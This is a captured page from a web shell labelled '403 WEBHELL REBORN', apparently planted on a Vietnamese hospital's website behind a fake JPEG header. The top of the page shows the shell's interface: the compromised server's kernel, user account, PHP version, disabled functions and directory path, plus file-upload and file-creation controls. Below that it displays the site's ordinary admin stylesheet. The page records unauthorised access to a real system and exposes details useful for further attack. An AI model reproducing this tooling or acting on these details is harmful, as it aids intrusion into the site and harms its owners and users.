ÿØÿà JFIF  ` ` ÿþš 403 WEBHELL REBORN
403 WEBHELL REBORN
Server : Apache/2
System : Linux vps.phamthanh.local 3.10.0-1160.102.1.el7.x86_64 #1 SMP Tue Oct 17 15:42:21 UTC 2023 x86_64
User : benhviencoc7 ( 1008)
PHP Version : 5.6.40
Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
Directory :  /home/benhviencoc7/domains/benhviendkkvcampha.vn/private_html/adminvn/templates/css/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

Buat Folder Baru:
Buat File Baru:

Current File : /home/benhviencoc7/domains/benhviendkkvcampha.vn/private_html////adminvn/templates/css/style.css
* {
    margin: 0;
    padding: 0;
}

body {
    background-color: #F9F9F9;
    color: #333333;
    font-family: Tahoma, Arial, sans-serif; 
    font-size: 14px;
}

img, button {
    border: 0;
}


textarea, input[type="text"], input[type="password"] {
    border: silver solid 1px;
    padding: 2px;
    -moz-border-radius: 5px;
    -webkit-border-radius: 5px;
    -khtml-border-radius: 5px;
    border-radius: 5px;
}

input.cats_order{
    border: white solid 1px ;
    padding: 2px ;
    border-radius: 5px;
}

input.cats_order:hover{
    border: silver solid 1px ;
    border-radius: 5px;
    padding: 2px;
    
}

textarea.cats_order{
    border: white solid 1px ;
    padding: 2px ;
    border-radius: 5px;
    background: transparent;
}

textarea.cats_order:hover{
    background: #fff;
    border: silver solid 1px ;
    border-radius: 5px;
    padding: 2px;
}

p.form {
    padding-bottom: 10px;
}

p.form input[type="text"] {
    width: 99%; 
    height: 25px; 
    font-size: 18px; 
    color: #333333;
}

button.bt, input[type="submit"], input[type="reset"], input[type="button"] {
    background-image: url('../images/button-white.png');
    height: 22px;
    padding: 0 5px;
    border: #BBBBBB solid 1px;
    -moz-border-radius: 10px;
    -webkit-border-radius: 10px;
    -khtml-border-radius: 10px;
    border-radius: 10px;
}

button.bt:hover, input[type="submit"]:hover, input[type="reset"]:hover, input[type="button"]:hover {
    border-color: #464646;
    cursor: pointer;
}

select {
    -moz-border-radius: 5px;
    -webkit-border-radius: 5px;
    -khtml-border-radius: 5px;
    border-radius: 5px;
    border: #DFDFDF solid 1px;
    padding: 2px;
}

ul, li {
    list-style: none;
}

a {
    font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif;
    text-decoration: none;
    color: #333333;
}

a:hover {
    color: #DA616A;
    cursor: pointer;
}
img {
    vertical-align: middle;
}
img {
    border: 0 none;
}
#container {
    min-width: 999px;
    min-height: 600px;
}

#header {
    background: #262525 none repeat scroll 0 0;
    border: 0 none;
    border-radius: 0;
    box-shadow: 0 -1px 0 #191919 inset;
    color: #fff;
    margin: 0;
    min-height: 50px;
}
#header .navbar-brand {
    font-size: 18px;

}
#header .navbar-brand {
    color: #ffffff;
    font-family: "Titillium Web",Geneva,sans-serif;
    font-weight: 700;
    margin-left: 5px;
}
#header .navbar-brand > img {

    padding-right: 4px;
}
#header .copyright {
    font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif;
    float: left;
    line-height: 50px;
    font-size: 22px;
    color:#F9F9F9;
    padding-left: 20px;
}

#header em {
    -moz-border-radius: 3px;
    -webkit-border-radius: 3px;
    -khtml-border-radius: 3px;
    border-radius: 3px;
    background-image: url('../images/button-medium.png');
    color: #AAAAAA;
    padding: 0 5px;
    font-size: 14px;
    line-height: 20px;
    font-style: normal;
    vertical-align: middle;
}

#header em:hover {
    background-position: 0 -27px;
    cursor: pointer;
}

#header .info {
    float: right; 
    margin: 10px 20px;
}

#header .info img {
    vertical-align: middle; 
    margin: auto auto 5px -10px;
}

#header .info em{
    margin-left: 5px;
}

#main {
    padding: 15px;
}

#sidebar {
    font-size: 12px;
    line-height: 30px;
    float: left;
    width: 150px;
    margin-bottom: 20px;
}

#sidebar * {
    border-color: #E3E3E3;
}

#sidebar .toggle {
    width: 25px;
    height: 30px;
    float: right;
}

#sidebar .menu:hover .toggle {
    background: url('../images/menu-bits.png') left -109px no-repeat;
}

#sidebar .in .toggle, #sidebar .in:hover .toggle {
    background: url('../images/menu-bits.png') -1px -207px no-repeat;
}

#sidebar .toggle-not {
    width: 25px;
    height: 30px;
    float: right;
    clear: right;
}

#sidebar .menu {
    background-color: #F1F1F1;
    color: #F9F9F9;
    padding-left: 5px;
    height: 30px;
    border-style: solid;
    border-width: 0 1px 1px 1px;
}

#sidebar .top {
    border-top-width: 1px;
}

#sidebar .in {
    background: url('../images/menu-bits.png') repeat-x;
    color: #F9F9F9;
    border-width: 0px;
}

.radius-top {
    -moz-border-radius-topleft: 5px;
    -moz-border-radius-topright: 5px;
    -webkit-border-radius-topleft: 5px;
    -webkit-border-radius-topright: 5px;
    -khtml-border-top-left-radius: 5px;
    -khtml-border-top-right-radius: 5px;
    border-top-left-radius: 5px;
    border-top-right-radius: 5px;
}

.radius-bottom {
    -moz-border-radius-bottomleft: 5px;
    -moz-border-radius-bottomright: 5px;
    -webkit-border-radius-bottomleft: 5px;
    -webkit-border-radius-bottomright: 5px;
    -khtml-border-bottom-left-radius: 5px;
    -khtml-border-bottom-right-radius: 5px;
    border-bottom-left-radius: 5px;
    border-bottom-right-radius: 5px;
}

#sidebar #all-sidebar li {
    cursor: pointer;
}

#sidebar #all-sidebar li.line {
    background: url('../images/menu-arrows.png') no-repeat;
    margin: 5px 0;
    height: 10px;
    cursor: default;
}

#sidebar #all-sidebar > li > ul {
    display: none;
    border-bottom: #E3E3E3 solid 1px;
    border-right: #E3E3E3 solid 1px;
}

#sidebar #all-sidebar > li > ul > li {
    line-height: 25px;
    height: 25px;
    padding-left: 10px;
}

#sidebar #all-sidebar > li > ul > .curent {
    background: #F1F1F1 url('../images/menu-dark.png') no-repeat;
}

#sidebar #all-sidebar > li > ul > li:hover {
    background-color: #F4FAFB;
}

#sidebar #all-sidebar > li > ul > .curent:hover {
    background-color: #F1F1F1;
}

#sidebar #all-sidebar > li > ul > .curent a {
    font-weight: bold;
}

#sidebar #all-sidebar > li > ul > li {
    background: transparent url('../images/menu-dark.png') left -50px no-repeat;
}

#sidebar .in a {
    min-width: 10em;
    color: #F9F9F9;
}

#sidebar .menu-image {
    width: 20px;
    height: 25px;
    float: left;
}

#sidebar .menu:hover a {
    color: #DA616A;
}

#sidebar .in:hover a {
    color: #F9F9F9;
}

#sidebar #all-sidebar > li > ul > li:hover a {
    color: #0080FF;
}

#sidebar #all-sidebar > li > ul > .curent:hover a {
    color: #333333;
}

#sidebar .icon-home {
    background: url('../images/menu.png') -66px -32px no-repeat;
}

#sidebar .menu:hover .icon-home, #sidebar .in .icon-home {
    background: url('../images/menu.png') -66px 0 no-repeat;
}

#sidebar .icon-support {
    background: url('../images/menu.png') -366px -32px no-repeat;
}

#sidebar .menu:hover .icon-support, #sidebar .in .icon-support {
    background: url('../images/menu.png') -366px 0 no-repeat;
}

#sidebar .icon-help {
    background: url('../images/menu.png') -426px -32px no-repeat;
}

#sidebar .menu:hover .icon-help, #sidebar .in .icon-help {
    background: url('../images/menu.png') -426px 0 no-repeat;
}

#sidebar .icon-cntnews {
    background: url('../images/menu.png') -395px -32px no-repeat;
}

#sidebar .menu:hover .icon-cntnews, #sidebar .in .icon-cntnews {
    background: url('../images/menu.png') -395px 0 no-repeat;
}

#sidebar .icon-post {
    background: url('../images/menu.png') -156px -32px no-repeat;
}

#sidebar .menu:hover .icon-post, #sidebar .in .icon-post {
    background: url('../images/menu.png') -156px 0 no-repeat;
}

#sidebar .icon-file {
    background: url('../images/menu.png') -126px -32px no-repeat;
}

#sidebar .menu:hover .icon-file, #sidebar .in .icon-file {
    background: url('../images/menu.png') -126px 0 no-repeat;
}

#sidebar .icon-link {
    background: url('../images/menu.png') -96px -32px no-repeat;
}

#sidebar .menu:hover .icon-link, #sidebar .in .icon-link {
    background: url('../images/menu.png') -96px 0 no-repeat;
}

#sidebar .icon-page {
    background: url('../images/menu.png') -6px -32px no-repeat;
}

#sidebar .menu:hover .icon-page, #sidebar .in .icon-page {
    background: url('../images/menu.png') -6px 0 no-repeat;
}

#sidebar .icon-comment {
    background: url('../images/menu.png') -36px -32px no-repeat;
}

#sidebar .icon-menu {
    background: url('../images/menu.png') -186px -32px no-repeat;
}

#sidebar .menu:hover .icon-comment, #sidebar .in .icon-comment {
    background: url('../images/menu.png') -36px 0 no-repeat;
}

#sidebar .icon-tpl {
    background: url('../images/menu.png') -246px -32px no-repeat;
}

#sidebar .menu:hover .icon-tpl, #sidebar .in .icon-tpl {
    background: url('../images/menu.png') -246px 0 no-repeat;
}

#sidebar .icon-info {
    background: url('../images/menu.png') -186px -32px no-repeat;
}

#sidebar .menu:hover .icon-info, #sidebar .in .icon-info {
    background: url('../images/menu.png') -186px 0 no-repeat;
}

#sidebar .icon-user {
    background: url('../images/menu.png') -307px -32px no-repeat;
}

#sidebar .menu:hover .icon-user, #sidebar .in .icon-user {
    background: url('../images/menu.png') -307px 0 no-repeat;
}

#sidebar .icon-my {
    background: url('../images/menu.png') -486px -32px no-repeat;
}

#sidebar .menu:hover .icon-my, #sidebar .in .icon-my {
    background: url('../images/menu.png') -486px 0 no-repeat;
}

#sidebar .icon-message {
    background: url('../images/menu.png') -456px -32px no-repeat;
}

#sidebar .menu:hover .icon-message, #sidebar .in .icon-message {
    background: url('../images/menu.png') -456px 0 no-repeat;
}

#sidebar .icon-add-ons {
    background: url('../images/menu.png') -336px -32px no-repeat;
}

#sidebar .menu:hover .icon-add-ons, #sidebar .in .icon-add-ons {
    background: url('../images/menu.png') -336px 0 no-repeat;
}

#sidebar .icon-settings {
    background: url('../images/menu.png') -216px -32px no-repeat;
}

#sidebar .menu:hover .icon-settings, #sidebar .in .icon-settings {
    background: url('../images/menu.png') -216px 0 no-repeat;
}

#sidebar .icon-product {
    background: url('../images/menu.png') -516px -32px no-repeat;
}

#sidebar .menu:hover .icon-product, #sidebar .in .icon-product {
    background: url('../images/menu.png') -516px 0 no-repeat;
}

#sidebar .icon-bill {
    background: url('../images/menu.png') -576px -32px no-repeat;
}

#sidebar .menu:hover .icon-bill, #sidebar .in .icon-bill {
    background: url('../images/menu.png') -576px 0 no-repeat;
}

#sidebar .icon-cart {
    background: url('../images/menu.png') -546px -32px no-repeat;
}

#sidebar .menu:hover .icon-cart, #sidebar .in .icon-cart {
    background: url('../images/menu.png') -546px 0 no-repeat;
}

#sidebar .icon-contact {
    background: url('../images/menu.png') -606px -32px no-repeat;
}

#sidebar .menu:hover .icon-contact, #sidebar .in .icon-contact {
    background: url('../images/menu.png') -606px 0 no-repeat;
}

#contered {
    margin-left: 170px;
}

#contered h1 {
    text-shadow: 0 -1px 0 #3F3F3F;
    font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif;
    font-size: 25px;
    font-style: italic;
    font-weight: normal;
    height: 50px;
    padding-left: 55px;
    line-height: 60px;
    margin-bottom: 10px;
}

#contered .icon-main-start {
    background: url('../images/icon-menu.png') no-repeat;
}

#contered .icon-info {
    background: url('../images/icon-menu.png') left -900px no-repeat;
}

#contered .icon-support {
    background: url('../images/icon-menu.png') left -950px no-repeat;
}

#contered .icon-bill {
    background: url('../images/icon-menu.png') left -400px no-repeat;
}

#contered .icon-cntnews {
    background: url('../images/icon-menu.png') left -450px no-repeat;
}

#contered .icon-help {
    background: url('../images/icon-menu.png') left -150px no-repeat;
}

#contered .icon-post-add {
    background: url('../images/icon-menu.png') left -800px no-repeat;
}

#contered .icon-file-list {
    background: url('../images/icon-menu.png') left -200px no-repeat;
}

#contered .icon-page-add {
    background: url('../images/icon-menu.png') left -600px no-repeat;
}

#contered .icon-comment {
    background: url('../images/icon-menu.png') left -550px no-repeat;
}

#contered .icon-link {
    background: url('../images/icon-menu.png') left -500px no-repeat;
}

#contered .icon-page {
    background: url('../images/icon-menu.png') left -450px no-repeat;
}

#contered .icon-message {
    background: url('../images/icon-menu.png') left -350px no-repeat;
}

#contered .icon-user {
    background: url('../images/icon-menu.png') left -100px no-repeat;
}

#contered .icon-product {
    background: url('../images/icon-menu.png') left -50px no-repeat;
}

#contered .icon-settings {
    background: url('../images/icon-menu.png') left -250px no-repeat;
}

#contered .icon-contact {
    background: url('../images/icon-menu.png') left -1000px no-repeat;
}

#contered .icon-video {
    background: url('../images/icon-menu.png') left -1050px no-repeat;
}

#contered .left {
    width: 49%;
    float: left;
}

#contered .right {
    width: 49%;
    float: right;
}

#contered .start-mod {
    margin-bottom: 10px;
    border: #DFDFDF solid 1px;
}

#contered .start-mod h2 {
    background: url('../images/menu-content.png');
    color: #333;
    text-shadow: 1px 1px 0 #FFF;
    font-family: sans-serif; 
    font-size: 14px;
    line-height: 25px;
    padding-left: 10px;
}

#contered .start-toggle {
    cursor: pointer;
    width: 25px;
    height: 25px;
    float: right;
}

#contered .toggle-show {
    background: url('../images/menu-bits.png') 0 -296px no-repeat;
}

#contered .toggle-hidden {
    background: url('../images/menu-bits.png') 0 -331px no-repeat;
}

#contered .show {
    display: block;
}

#contered .hidden {
    display: none;
}

#contered .start-mod .content {
    padding: 10px;
}

#contered .start-mod .info-start {
    width: 100%;
    padding: 0 10px;
    font-weight: bold;
    margin-bottom: 10px;
}

#contered .start-mod .info-start td {
}

.info-mod {
    background-color: #F7F3F7;
    padding: 10px;
    border: #DFDFDF solid 1px;
}

#wrapper {
    background-color: #464646;
    height: 50px;
    clear: both;
}

.post-t tr.post-tt {
    background: url('../images/menu-content.png');
}

.post-t tr.post-tt td {
    text-shadow: 1px 1px 0 #FFF;
    font-weight: bold;
    border: 0;
    line-height: 25px;
}

.post-t td {
    color: #333;
    font-family: sans-serif; 
    font-size: 14px;
    padding-left: 10px;
    line-height: 20px;
    border-bottom: #DFDFDF solid 1px;
}

.post-t td a {
    color: #21759B;
    font-family: sans-serif; 
    font-size: 14px;
}

.post-t td a:hover {
    color: #DA616A;
    cursor: pointer;
}

.post-t .check {
    width: 1%;
}

.post-t .p-title {
    width: 48%;
}

.post-t .p-author {
    width: 12%;
}

.post-t .p-cat {
    width: 20%;
}

.post-t .p-comment {
    width: 5%;
}

.post-t .p-date {
    width: 5%;
}

.post-t .c-name {
    width: 40%;
}

.post-t .c-desc {
    width: 40%;
}

.post-t .c-post {
    width: 20%;
    text-align: center;
}

.post-t .f-name {
    width: 30%;
}

.post-t .f-desc {
    width: 35%;
}

.post-t .f-date {
    width: 20%;
}

.post-t .l-icon {
    width: 20%;
}

.post-t .l-name {
    width: 35%;
}

.post-t .l-desc {
    width: 40%;
}

.post-t .l-type {
    width: 15%;
}

.post-t .pg-name {
    width: 65%;
}

.post-t .pg-date {
    width: 30%;
}

.post-t .m-author {
    width: 20%;
}

.post-t .m-title {
    width: 55%;
}

.post-t .m-date {
    width: 20%;
}
.post-t .u-acc {
    width: 15%;
}

.post-t .u-name {
    width: 20%;
}

.post-t .u-email {
    width: 35%;
}

.post-t .u-class {
    width: 10%;
}

.post-t .u-pow {
    width: 15%;
}

.post-t .cm-author {
    width: 20%;
}

.post-t .cm-comment {
    width: 45%;
}

.post-t .cm-post {
    width: 30%;
}

.post-t .g-name {
    width: 55%;
}

.post-t .g-user {
    width: 40%;
}

.post-t .pd-code {
    width: 6%;
}

.post-t .pd-name {
    width: 35%;
}

.post-t .pd-price {
    width: 10%;
}

.post-t .pd-total {
    width: 2%;
}

.post-t .pd-cat {
    width: 10%;
}


.navigation { 
    font-size:10px; 
    clear: both; 
    padding: 10px 0px; 
    text-align: center; 
    cursor:default; 
    font-weight:bold; 
    color:#545454; 
} 
.navigation .current_page_item, .navigation .page_item a { 
    font-family: Tahoma, Arial, sans-serif; 
    outline:none; 
    margin:2px; 
    padding:2px 6px; 
    border: 1px solid #545454; 
    text-decoration:none; 
} 

.navigation .page_item a { 
    font-family: Tahoma, Arial, sans-serif; 
    border: 1px solid #545454; 
    color:#545454; 
} 

.navigation .current_page_item, .navigation .page_item a:hover { 
    color: #FFFFFF; 
    background-color:#545454; 
}


.error{
    background-color: #FFD7D7;
}
.Infoerror{
    color: red;
}

.file p {
    padding: 5px 0;
}

.update td.m {
    background-color: silver;
    text-align: center;
}

a.remove {
    background: url('../images/remove.png') left center no-repeat;
    padding: 10px;
}

a.add {
    background: url('../images/add.png') left center no-repeat;
    padding: 10px;
}

a.reset {
    background: url('../images/reset.png') left center no-repeat;
    padding: 10px;
}

h2.title {
    font-family: Times New Roman; 
    font-size: 18px; 
    margin-bottom: 20px;
}

table.post-t {
    margin:0px 0 0px 0;
    background:#fff;
    width:100%;
    border-bottom:none;
}

.post-t thead td, thead th {
    background-color:#e6e6e6;
}

.post-t tr td, thead th {
    border-left:1px solid #ccc;
    text-align:left;
    padding:3px;
    color:#616161;
    vertical-align:middle;
}

.post-t thead td, thead th {
    font-weight:bold;
    padding:10px 6px;
}

.post-t th, td {
    border-bottom:1px solid #dedede;
}
.post-t tbody th {
    padding:8px 8px;
    text-align:left;
}

.post-t tbody tr.alt td, tbody tr.odd td {
    color:#464646;
}
.post-t tr.clicked {
    background-color: #DDDDFF;
}
.post-t tbody tr.alt td, tbody tr.alt th, tbody tr.odd {
    background-color:#f5f5f5;
}
.post-t tbody tr:hover td, tbody tr:hover th {
    background-color:#FFFFCF;
}

.post-t .headerSortDown, .headerSortUp {
    background-repeat:no-repeat;
    background-color:#dcdcdc!important;
    color:#404040!important;
}

.post-t .header span {
    float:right;
}

.post-t tr .center {
    padding:15px;
    width:5px;
}

table.post-t a.btn span.ui-icon {
    left:0.1em;
}
.product-images table {
    margin-top: 20px;
}
.product-images table tr {
    border: none;
}
.product-images table td + td {
    width: 250px;
    text-align: right;
}

span.dropt {border-bottom: thin dotted;}
span.dropt:hover {text-decoration: none; background: #ffffff; z-index: 6; }
span.dropt span {position: absolute; left: -9999px;
  margin: 0px 0 0 0px; padding: 3px 3px 3px 3px;
  border-style:solid; border-color:black; border-width:1px; z-index: 6;}
span.dropt:hover span {left: 2%; background: #ffffff;} 
span.dropt span {position: absolute; left: -9999px;
  margin: 4px 0 0 0px; padding: 3px 3px 3px 3px; 
  border-style:solid; border-color:black; border-width:1px;}
span.dropt:hover span {margin: -40px 0 0 800px; background: #ffffff; z-index:6;} 

.btn {
    -moz-border-bottom-colors: none;
    -moz-border-left-colors: none;
    -moz-border-right-colors: none;
    -moz-border-top-colors: none;
    border-color: -moz-use-text-color;
    border-image: none;
    border-style: none none solid;
    border-width: medium medium 4px;
    outline: medium none;
    padding: 6px 12px;
    transition: border-color 0.1s ease-in-out 0s, background-color 0.1s ease-in-out 0s;
}
#header .info > a {
    border: medium none;
    color: #fff;
    font-size: 1em;
    padding-left: 18px;
    padding-right: 18px;
}
#header-navbar .nav > li > a:hover, #header-navbar .nav > li > a:focus, #header-navbar .nav .open > a, #header-navbar .nav .open > a:hover, #header-navbar .nav .open > a:focus, #sidebar-nav .nav > li > a:hover, #sidebar-nav .nav .open > a:hover, .navbar-toggle:hover, .navbar-toggle:focus, .mobile-search.active > .btn {
    background: #34d1be none repeat scroll 0 0;
    box-shadow: 0 -1px 0 #2bad9d inset;
    color: #fff;
    outline: medium none;
}
.nav-pills > li.active > a, .nav-pills > li.active > a:hover, .nav-pills > li.active > a:focus, #sidebar-nav .nav-pills > li.active > a, #sidebar-nav .nav-pills > li.active > a:hover, #sidebar-nav .nav-pills > li.active > a:focus {
    background-color: #34d1be;
    box-shadow: 0 -1px 0 0 #8bf2e6 inset, 0 0 4px rgba(59, 59, 59, 0.6);
}
.post-t tr.post-tt {
    background: url('../images/menu-content.png');
}
.update td.m {
    background-color: silver;
    text-align: center;
}
a.remove {
    background: rgba(0, 0, 0, 0) url("../images/remove.png") no-repeat scroll left center;
    padding: 10px;
}
a.add {
    background: rgba(0, 0, 0, 0) url("../images/add.png") no-repeat scroll left center;
    padding: 10px;
}
a.reset {
    background: rgba(0, 0, 0, 0) url("../images/reset.png") no-repeat scroll left center;
    padding: 10px;
}

Anon7 - 2021